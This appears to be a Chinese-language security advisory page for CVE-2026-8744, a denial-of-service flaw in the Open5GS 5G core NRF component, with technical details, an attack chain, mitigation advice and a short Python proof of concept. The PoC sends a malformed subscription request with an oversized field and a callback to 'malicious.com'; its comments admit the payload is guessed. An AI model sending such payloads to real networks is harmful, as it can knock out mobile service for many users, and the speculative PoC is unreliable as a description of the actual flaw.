IPBUF安全漏洞报告
English
CVE-2026-8744 CVSS 4.3 中危

CVE-2026-8744 Open5GS拒绝服务漏洞

披露日期: 2026-05-17
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-8744
漏洞类型
拒绝服务
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Open5GS

相关标签

拒绝服务Open5GS5G CoreNRFDoS

漏洞概述

Open5GS是用于4G/5G移动核心网的开源实现。在2.7.7及之前的版本中,其NRF(网络存储库功能)组件存在安全漏洞。该漏洞位于/lib/sbi/context.c文件的ogs_sbi_subscription_data_add或ogs_sbi_nf_service_add函数中。攻击者可以通过网络发送特定的恶意数据包,利用该漏洞导致系统崩溃或服务中断,从而发起拒绝服务攻击。

技术细节

该漏洞源于Open5GS中NRF组件在处理服务发现或订阅数据时的逻辑缺陷。具体受影响的函数`ogs_sbi_subscription_data_add`负责添加订阅数据,而`ogs_sbi_nf_service_add`负责添加网络功能服务。在解析和存储这些数据时,代码未能正确处理边界条件或异常输入。攻击者只需具备低权限,即可通过SBI(Service Based Interface)接口发送特制的请求。当NRF尝试执行上述受影响函数处理该请求时,会触发空指针解引用、内存越界或资源耗尽,导致NRF进程异常终止,进而导致整个5G核心网的瘫痪。

攻击链分析

STEP 1
信息收集
攻击者扫描目标网络,识别出Open5GS NRF组件的开放端口(默认为7777)和服务接口。
STEP 2
身份认证
利用低权限账户或某些无需认证的接口端点获取访问NRF SBI服务的权限。
STEP 3
漏洞利用
向ogs_sbi_subscription_data_add或ogs_sbi_nf_service_add函数接口发送精心构造的恶意请求数据。
STEP 4
拒绝服务
目标NRF进程在处理恶意数据时崩溃,导致5G核心网服务中断,无法处理用户请求。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import json # Target Open5GS NRF SBI Interface # Default NRF port is usually 7777 target_url = "http://<target-ip>:7777/nnrf-nfm/v1/subscription" # Malformed payload designed to trigger ogs_sbi_subscription_data_add vulnerability # The actual payload structure depends on the specific implementation flaw, # but typically involves missing required fields or oversized data. payload = { "nfInstanceId": "exploit-test", "nfType": "AMF", "subscriptionId": None, # Potential null pointer trigger "reqValidityPeriod": "999999999", "reqNotifications": [ { "notificationURI": "http://malicious.com/callback", "notifyCorrelationId": "A" * 10000 # Potential buffer overflow trigger } ] } headers = { "Content-Type": "application/json", "Accept": "application/json" } try: print(f"Sending exploit payload to {target_url}...") response = requests.post(target_url, data=json.dumps(payload), headers=headers, timeout=5) print(f"Response Status Code: {response.status_code}") print("If the service becomes unresponsive, the DoS is successful.") except requests.exceptions.RequestException as e: print(f"Request failed (possible DoS occurred): {e}")

影响范围

Open5GS <= 2.7.7

防御指南

临时缓解措施
在未应用补丁之前,建议在网络边界部署防火墙规则,严格限制对Open5GS NRF端口的访问。同时,应启用深度包检测(DPI)或API网关来过滤异常的SBI请求流量,特别是包含畸形JSON或异常字段长度的高并发请求,以减轻被攻击的风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表